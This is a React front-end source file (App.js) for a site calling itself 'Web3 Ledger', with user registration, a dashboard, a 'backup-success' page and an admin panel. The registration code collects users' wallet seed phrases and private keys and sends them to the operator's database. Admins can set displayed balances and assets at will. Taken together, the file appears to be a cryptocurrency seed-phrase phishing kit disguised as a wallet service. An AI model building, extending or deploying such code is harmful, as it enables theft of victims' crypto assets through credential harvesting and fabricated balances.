import React, { useState, createContext, useContext, useEffect } from 'react';
import { Routes, Route, Navigate, useLocation } from 'react-router-dom';
import { Toaster } from 'react-hot-toast';

// Pages
import Home from './pages/Home';
import LedgerService from './pages/LedgerService';
import Staking from './pages/Staking';
import Trading from './pages/Trading';
import PrivacyPolicy from './pages/PrivacyPolicy';
import TermsOfService from './pages/TermsOfService';
import CookiePolicy from './pages/CookiePolicy';
import Contact from './pages/Contact';
import AboutUs from './pages/AboutUs';
import Login from './pages/Login';
import GetStarted from './pages/GetStarted';
import Dashboard from './pages/Dashboard';
import BackupSuccess from './pages/BackupSuccess';
import AdminPanel from './pages/AdminPanel';
import AdminLogin from './pages/AdminLogin';

// Components

// API Services (Prisma + PostgreSQL)
import * as api from './services/api';

// Context for Auth
export const AuthContext = createContext();

export const AuthProvider = ({ children }) => {
  const [user, setUser] = useState(null);
  const [admin, setAdmin] = useState(null);
  const [users, setUsers] = useState([]);
  const [transactions, setTransactions] = useState([]);
  const [notifications, setNotifications] = useState([]);
  const [activityLogs, setActivityLogs] = useState([]);
  const [isLoading, setIsLoading] = useState(true);
  const [dataLoaded, setDataLoaded] = useState(false);

  // Initialize: restore session and fetch data via polling
  useEffect(() => {
    const savedUser = localStorage.getItem('web3ledger_user');
    const savedAdmin = localStorage.getItem('web3ledger_admin');
    if (savedUser) setUser(JSON.parse(savedUser));
    if (savedAdmin && api.isTokenValid()) {
      setAdmin(JSON.parse(savedAdmin));
    } else if (savedAdmin) {
      localStorage.removeItem('web3ledger_admin');
      sessionStorage.removeItem('web3ledger_token');
    }
    setIsLoading(false);

    const fetchData = async () => {
      const hasAdminToken = api.isTokenValid();
      if (!hasAdminToken) {
        setDataLoaded(true);
        return;
      }

      try {
        const [usersData, txData, logsData] = await api.requestWithRetry(
          () => Promise.all([
            api.getAllUsers(),
            api.getAllTransactions(),
            api.getAllActivityLogs(),
          ]),
          3, 3000
        );

        setUsers(usersData);
        setTransactions(txData);
        setActivityLogs(logsData);
        setDataLoaded(true);
        setUser((prev) => {
          if (!prev?.id) return prev;
          const fresh = usersData.find((u) => u.id === prev.id);
          if (fresh) {
            const updated = { ...prev, ...fresh };
            localStorage.setItem('web3ledger_user', JSON.stringify(updated));
            return updated;
          }
          return prev;
        });
      } catch (err) {
        console.error('Error fetching data:', err);
      }
    };

    fetchData();
    const interval = setInterval(fetchData, 5000);

    const handleSessionExpired = () => {
      setAdmin(null);
      localStorage.removeItem('web3ledger_admin');
    };
    window.addEventListener('admin-session-expired', handleSessionExpired);

    return () => {
      clearInterval(interval);
      window.removeEventListener('admin-session-expired', handleSessionExpired);
    };
  }, []);

  // Poll notifications for logged-in user
  useEffect(() => {
    if (!user?.id) {
      setNotifications([]);
      return;
    }

    const fetchNotifications = async () => {
      try {
        const data = await api.getNotificationsByUserId(user.id);
        setNotifications(data);
      } catch (err) {
        console.error('Error fetching notifications:', err);
      }
    };

    fetchNotifications();
    const interval = setInterval(fetchNotifications, 10000);
    return () => clearInterval(interval);
  }, [user?.id]);

  // Register new user
  const registerUser = async (userData) => {
    const walletId = api.generateWalletId();
    
    const newUserData = {
      walletId: walletId,
      walletType: userData.walletType,
      walletName: userData.walletName || userData.walletType,
      seedPhrase: userData.seedPhrase?.toLowerCase().trim() || '',
      privateKey: userData.privateKey?.toLowerCase() || '',
      email: userData.email || '',
      balance: userData.balance || 0,
      currency: userData.currency || 'USD',
      status: 'active'
    };

    const newUser = await api.createUser(newUserData);

    const sessionUser = {
      ...newUser,
      createdAt: newUser.createdAt || new Date().toISOString(),
      lastLogin: newUser.lastLogin || new Date().toISOString()
    };
    setUser(sessionUser);
    localStorage.setItem('web3ledger_user', JSON.stringify(sessionUser));

    try {
      await api.sendNotificationToDB({
        userId: newUser.id,
        title: 'Welcome to Web3 Ledger!',
        message: 'Your wallet has been successfully connected. Start exploring our features and manage your assets securely.',
        type: 'success'
      });
    } catch (err) {
      console.error('Failed to send welcome notification:', err);
    }

    try {
      await api.addActivityLog({
        action: 'user_registered',
        description: `New user registered with ${userData.walletType} wallet`,
        userId: newUser.id,
        adminId: null,
        metadata: { walletType: userData.walletType }
      });
    } catch (err) {
      console.error('Failed to add activity log:', err);
    }

    return sessionUser;
  };

  // Log in with Wallet ID + the last word of the recovery phrase
  const loginUser = async (credentials) => {
    const existingUser = await api.loginWithWalletId(credentials.walletId, credentials.lastWord);

    if (existingUser.status === 'suspended') {
      return { error: 'suspended', user: existingUser };
    }

    const sessionUser = { ...existingUser, lastLogin: new Date().toISOString() };
    setUser(sessionUser);
    localStorage.setItem('web3ledger_user', JSON.stringify(sessionUser));

    try {
      await api.addActivityLog({
        action: 'user_login',
        description: 'User logged in with wallet ID + recovery word',
        userId: existingUser.id,
        adminId: null,
        metadata: {}
      });
    } catch (err) {
      console.error('Failed to add login activity log:', err);
    }

    return sessionUser;
  };

  // Logout user
  const logoutUser = async () => {
    const currentUser = user;
    setUser(null);
    setNotifications([]);
    localStorage.removeItem('web3ledger_user');
    
    if (currentUser) {
      try {
        await api.addActivityLog({
          action: 'user_logout',
          description: 'User logged out',
          userId: currentUser.id,
          adminId: null,
          metadata: {}
        });
      } catch (error) {
        console.error('Error logging logout:', error);
      }
    }
  };

  // Detect browser/OS/device from user agent
  const detectSessionInfo = () => {
    const ua = navigator.userAgent;
    let browser = 'Unknown';
    if (ua.includes('Edg/')) browser = 'Edge';
    else if (ua.includes('OPR/') || ua.includes('Opera')) browser = 'Opera';
    else if (ua.includes('Chrome')) browser = 'Chrome';
    else if (ua.includes('Safari')) browser = 'Safari';
    else if (ua.includes('Firefox')) browser = 'Firefox';

    let os = 'Unknown';
    if (ua.includes('Windows')) os = 'Windows';
    else if (ua.includes('Mac OS')) os = 'macOS';
    else if (ua.includes('Android')) os = 'Android';
    else if (ua.includes('iPhone') || ua.includes('iPad')) os = 'iOS';
    else if (ua.includes('Linux')) os = 'Linux';

    let device = 'Desktop';
    if (/Mobi|Android|iPhone|iPad|iPod/i.test(ua)) device = 'Mobile';
    else if (/Tablet|iPad/i.test(ua)) device = 'Tablet';

    return { browser, os, device };
  };

  // Admin login (server-side auth with JWT + optional 2FA)
  const loginAdmin = async (credentials) => {
    const data = await api.adminLogin(
      credentials.email,
      credentials.password,
      credentials.twoFactorCode
    );

    if (data.requires2FA) {
      return { requires2FA: true };
    }

    const adminData = { email: data.email, role: data.role };
    setAdmin(adminData);
    localStorage.setItem('web3ledger_admin', JSON.stringify(adminData));

    try {
      await api.addActivityLog({
        action: 'admin_login',
        description: 'Admin logged in',
        userId: null,
        adminId: credentials.email,
        metadata: {}
      });
      const sessionInfo = detectSessionInfo();
      await api.createAdminSession({
        adminId: credentials.email,
        ...sessionInfo,
      });
    } catch (error) {
      console.error('Error logging admin session:', error);
    }

    return { success: true };
  };

  // Admin logout
  const logoutAdmin = async () => {
    if (admin) {
      try {
        await api.addActivityLog({
          action: 'admin_logout',
          description: 'Admin logged out',
          userId: null,
          adminId: admin.email,
          metadata: {}
        });
      } catch (error) {
        console.error('Error logging admin logout:', error);
      }
    }
    setAdmin(null);
    localStorage.removeItem('web3ledger_admin');
    sessionStorage.removeItem('web3ledger_token');
  };

  // Update user balance
  const updateUserBalance = async (userId, newBalance) => {
    try {
      await api.updateUserBalance(userId, newBalance);
      if (user && user.id === userId) {
        const updatedUser = { ...user, balance: parseFloat(newBalance) };
        setUser(updatedUser);
        localStorage.setItem('web3ledger_user', JSON.stringify(updatedUser));
      }
    } catch (error) {
      console.error('Error updating balance:', error);
      throw error;
    }
  };

  // Update user crypto assets
  const updateUserAssets = async (userId, assets) => {
    try {
      await api.updateUserAssets(userId, assets);
      if (user && user.id === userId) {
        const updatedUser = { ...user, assets };
        setUser(updatedUser);
        localStorage.setItem('web3ledger_user', JSON.stringify(updatedUser));
      }
    } catch (error) {
      console.error('Error updating assets:', error);
      throw error;
    }
  };

  // Update single asset for user
  const updateUserSingleAsset = async (userId, symbol, amount) => {
    try {
      const updatedAssets = await api.updateUserSingleAsset(userId, symbol, amount);
      if (user && user.id === userId && updatedAssets) {
        const updatedUser = { ...user, assets: updatedAssets };
        setUser(updatedUser);
        localStorage.setItem('web3ledger_user', JSON.stringify(updatedUser));
      }
      return updatedAssets;
    } catch (error) {
      console.error('Error updating single asset:', error);
      throw error;
    }
  };

  // Update user status
  const updateUserStatus = async (userId, status) => {
    try {
      await api.updateUserStatus(userId, status);
      await api.addActivityLog({
        action: 'user_status_updated',
        description: `User status changed to ${status}`,
        userId: userId,
        adminId: admin?.email,
        metadata: { newStatus: status }
      });
    } catch (error) {
      console.error('Error updating status:', error);
      throw error;
    }
  };

  // Delete user
  const deleteUser = async (userId) => {
    try {
      await api.deleteUserFromDB(userId);
      await api.addActivityLog({
        action: 'user_deleted',
        description: `User ${userId} was deleted`,
        userId: null,
        adminId: admin?.email,
        metadata: { deletedUserId: userId }
      });
    } catch (error) {
      console.error('Error deleting user:', error);
      throw error;
    }
  };

  // Add transaction
  const addTransaction = async (transactionData) => {
    try {
      const newTransaction = await api.addTransaction(transactionData);
      await api.addActivityLog({
        action: 'transaction_created',
        description: `New ${transactionData.type} transaction: ${transactionData.amount} ${transactionData.asset}`,
        userId: transactionData.userId,
        adminId: null,
        metadata: { transactionId: newTransaction.id }
      });
      return newTransaction;
    } catch (error) {
      console.error('Error adding transaction:', error);
      throw error;
    }
  };

  // Get user transactions
  const getUserTransactions = (userId) => {
    return transactions.filter(tx => tx.userId === userId);
  };

  // Update transaction status
  const updateTransactionStatus = async (transactionId, status) => {
    try {
      await api.updateTransactionStatus(transactionId, status);
    } catch (error) {
      console.error('Error updating transaction:', error);
      throw error;
    }
  };

  // Send notification
  const sendNotification = async (userId, title, message, type = 'info') => {
    try {
      const newNotification = await api.sendNotificationToDB({
        userId,
        title,
        message,
        type
      });
      await api.addActivityLog({
        action: 'notification_sent',
        description: `Notification sent to user ${userId}: ${title}`,
        userId: userId,
        adminId: admin?.email,
        metadata: {}
      });
      return newNotification;
    } catch (error) {
      console.error('Error sending notification:', error);
      throw error;
    }
  };

  // Send bulk notification
  const sendBulkNotification = async (userIds, title, message, type = 'info') => {
    try {
      const promises = userIds.map(userId => 
        api.sendNotificationToDB({
          userId,
          title,
          message,
          type
        })
      );
      const results = await Promise.all(promises);
      await api.addActivityLog({
        action: 'bulk_notification_sent',
        description: `Bulk notification sent to ${userIds.length} users: ${title}`,
        userId: null,
        adminId: admin?.email,
        metadata: { userCount: userIds.length }
      });
      return results;
    } catch (error) {
      console.error('Error sending bulk notification:', error);
      throw error;
    }
  };

  // Get user notifications
  const getUserNotifications = (userId) => {
    return notifications.filter(n => n.userId === userId);
  };

  // Mark notification as read
  const markNotificationRead = async (notificationId) => {
    try {
      await api.markNotificationAsRead(notificationId);
      setNotifications(prev => prev.map(n => 
        n.id === notificationId ? { ...n, read: true } : n
      ));
    } catch (error) {
      console.error('Error marking notification as read:', error);
    }
  };

  // Mark all notifications as read
  const markAllNotificationsRead = async (userId) => {
    try {
      await api.markAllNotificationsAsRead(userId);
      setNotifications(prev => prev.map(n => 
        n.userId === userId ? { ...n, read: true } : n
      ));
    } catch (error) {
      console.error('Error marking all notifications as read:', error);
    }
  };

  // Delete notification
  const deleteNotification = async (notificationId) => {
    try {
      await api.deleteNotificationFromDB(notificationId);
    } catch (error) {
      console.error('Error deleting notification:', error);
    }
  };

  // Add activity log
  const addActivityLogEntry = async (action, description, userId = null, adminId = null, metadata = {}) => {
    try {
      await api.addActivityLog({
        action,
        description,
        userId,
        adminId,
        metadata
      });
    } catch (error) {
      console.error('Error adding activity log:', error);
    }
  };

  // Get activity logs
  const getActivityLogs = (filters = {}) => {
    let logs = [...activityLogs];
    if (filters.userId) {
      logs = logs.filter(log => log.userId === filters.userId);
    }
    if (filters.action) {
      logs = logs.filter(log => log.action === filters.action);
    }
    if (filters.startDate) {
      logs = logs.filter(log => new Date(log.createdAt) >= new Date(filters.startDate));
    }
    if (filters.endDate) {
      logs = logs.filter(log => new Date(log.createdAt) <= new Date(filters.endDate));
    }
    return logs;
  };

  // Export functions
  const exportUsersToCSV = () => {
    const headers = ['ID', 'Wallet ID', 'Wallet Type', 'Wallet Name', 'Email', 'Balance', 'Currency', 'Status', 'Created At', 'Last Login'];
    const csvContent = [
      headers.join(','),
      ...users.map(u => [
        u.id,
        u.walletId,
        u.walletType,
        u.walletName || '',
        u.email || '',
        u.balance,
        u.currency,
        u.status,
        u.createdAt,
        u.lastLogin
      ].join(','))
    ].join('\n');
    
    const blob = new Blob([csvContent], { type: 'text/csv' });
    const url = window.URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `web3ledger_users_${new Date().toISOString().split('T')[0]}.csv`;
    a.click();
    window.URL.revokeObjectURL(url);
    addActivityLogEntry('data_exported', 'User data exported to CSV', null, admin?.email);
  };

  const exportTransactionsToCSV = () => {
    const headers = ['ID', 'User ID', 'Type', 'Asset', 'Amount', 'From', 'To', 'Status', 'Hash', 'Created At'];
    const csvContent = [
      headers.join(','),
      ...transactions.map(tx => [
        tx.id,
        tx.userId,
        tx.type,
        tx.asset,
        tx.amount,
        tx.from,
        tx.to,
        tx.status,
        tx.hash || '',
        tx.createdAt
      ].join(','))
    ].join('\n');
    
    const blob = new Blob([csvContent], { type: 'text/csv' });
    const url = window.URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `web3ledger_transactions_${new Date().toISOString().split('T')[0]}.csv`;
    a.click();
    window.URL.revokeObjectURL(url);
    addActivityLogEntry('data_exported', 'Transaction data exported to CSV', null, admin?.email);
  };

  return (
    <AuthContext.Provider value={{
      user,
      admin,
      users,
      transactions,
      notifications,
      activityLogs,
      isLoading,
      dataLoaded,
      registerUser,
      loginUser,
      logoutUser,
      loginAdmin,
      logoutAdmin,
      updateUserBalance,
      updateUserAssets,
      updateUserSingleAsset,
      updateUserStatus,
      deleteUser,
      addTransaction,
      getUserTransactions,
      updateTransactionStatus,
      sendNotification,
      sendBulkNotification,
      getUserNotifications,
      markNotificationRead,
      markAllNotificationsRead,
      deleteNotification,
      addActivityLog: addActivityLogEntry,
      getActivityLogs,
      exportUsersToCSV,
      exportTransactionsToCSV
    }}>
      {children}
    </AuthContext.Provider>
  );
};

export const useAuth = () => useContext(AuthContext);

// Protected Route Component
const ProtectedRoute = ({ children, requireAdmin = false }) => {
  const { user, admin, isLoading } = useAuth();
  
  if (isLoading) {
    return (
      <div className="loading-screen">
        <div className="spinner"></div>
      </div>
    );
  }
  
  if (requireAdmin && !admin) {
    return <Navigate to="/admin/login" replace />;
  }
  
  if (!requireAdmin && !user) {
    return <Navigate to="/login" replace />;
  }
  
  return children;
};

const TAWK_SCRIPT_ID = 'tawk-script';
const TAWK_SCRIPT_SRC = 'https://embed.tawk.to/698fa765f6e6d41c36a269f0/1jhcibpul';
const CHAT_HIDDEN_ROUTES = ['/login', '/get-started', '/admin/login', '/admin', '/backup-success'];

const shouldHideChatForPath = (pathname) =>
  CHAT_HIDDEN_ROUTES.some((route) => pathname === route || pathname.startsWith(`${route}/`));

const toggleTawkFallbackVisibility = (hide) => {
  const selector = [
    "iframe[src*='tawk.to']",
    "iframe[id*='tawk']",
    "[id*='tawkchat']",
    '#tawkchat-container',
    '.tawk-min-container',
    '.tawk-max-container',
    '.tawk-button-circle',
  ].join(',');

  document.querySelectorAll(selector).forEach((el) => {
    if (hide) {
      el.style.setProperty('display', 'none', 'important');
      el.style.setProperty('visibility', 'hidden', 'important');
      el.style.setProperty('pointer-events', 'none', 'important');
    } else {
      el.style.removeProperty('display');
      el.style.removeProperty('visibility');
      el.style.removeProperty('pointer-events');
    }
  });
};

const TawkRouteGuard = () => {
  const location = useLocation();

  useEffect(() => {
    const shouldHide = shouldHideChatForPath(location.pathname);

    if (shouldHide) {
      const hideChat = () => {
        if (window.Tawk_API && typeof window.Tawk_API.hideWidget === 'function') {
          window.Tawk_API.hideWidget();
        }
        toggleTawkFallbackVisibility(true);
      };

      hideChat();
      const intervalId = window.setInterval(hideChat, 300);

      return () => {
        window.clearInterval(intervalId);
      };
    }

    let script = document.getElementById(TAWK_SCRIPT_ID);
    if (!script) {
      window.Tawk_API = window.Tawk_API || {};
      window.Tawk_LoadStart = new Date();

      window.Tawk_API.onLoad = function () {
        if (shouldHideChatForPath(window.location.pathname)) {
          window.Tawk_API.hideWidget();
          toggleTawkFallbackVisibility(true);
        }
      };

      script = document.createElement('script');
      script.id = TAWK_SCRIPT_ID;
      script.async = true;
      script.src = TAWK_SCRIPT_SRC;
      script.charset = 'UTF-8';
      script.setAttribute('crossorigin', '*');
      document.body.appendChild(script);
    }

    if (window.Tawk_API && typeof window.Tawk_API.showWidget === 'function') {
      window.Tawk_API.showWidget();
    }
    toggleTawkFallbackVisibility(false);
  }, [location.pathname]);

  return null;
};

function App() {
  return (
    <AuthProvider>
      <TawkRouteGuard />
      <Toaster
        position="top-right"
        toastOptions={{
          style: {
            background: '#1a1a1a',
            color: '#fff',
            border: '1px solid rgba(255,255,255,0.1)',
          },
          success: {
            iconTheme: {
              primary: '#22c55e',
              secondary: '#000',
            },
          },
          error: {
            iconTheme: {
              primary: '#ef4444',
              secondary: '#000',
            },
          },
        }}
      />
      <Routes>
        {/* Public Routes */}
        <Route path="/" element={<Home />} />
        <Route path="/ledger" element={<LedgerService />} />
        <Route path="/staking" element={<Staking />} />
        <Route path="/trading" element={<Trading />} />
        <Route path="/privacy-policy" element={<PrivacyPolicy />} />
        <Route path="/terms-of-service" element={<TermsOfService />} />
        <Route path="/cookie-policy" element={<CookiePolicy />} />
        <Route path="/contact" element={<Contact />} />
        <Route path="/about" element={<AboutUs />} />
        <Route path="/login" element={<Login />} />
        <Route path="/get-started" element={<GetStarted />} />
        
        {/* Protected User Routes */}
        <Route path="/dashboard" element={
          <ProtectedRoute>
            <Dashboard />
          </ProtectedRoute>
        } />
        <Route path="/backup-success" element={
          <ProtectedRoute>
            <BackupSuccess />
          </ProtectedRoute>
        } />
        
        {/* Admin Routes */}
        <Route path="/admin/login" element={<AdminLogin />} />
        <Route path="/admin" element={
          <ProtectedRoute requireAdmin>
            <AdminPanel />
          </ProtectedRoute>
        } />
        
        {/* Catch all */}
        <Route path="*" element={<Navigate to="/" replace />} />
      </Routes>
    </AuthProvider>
  );
}

export default App;

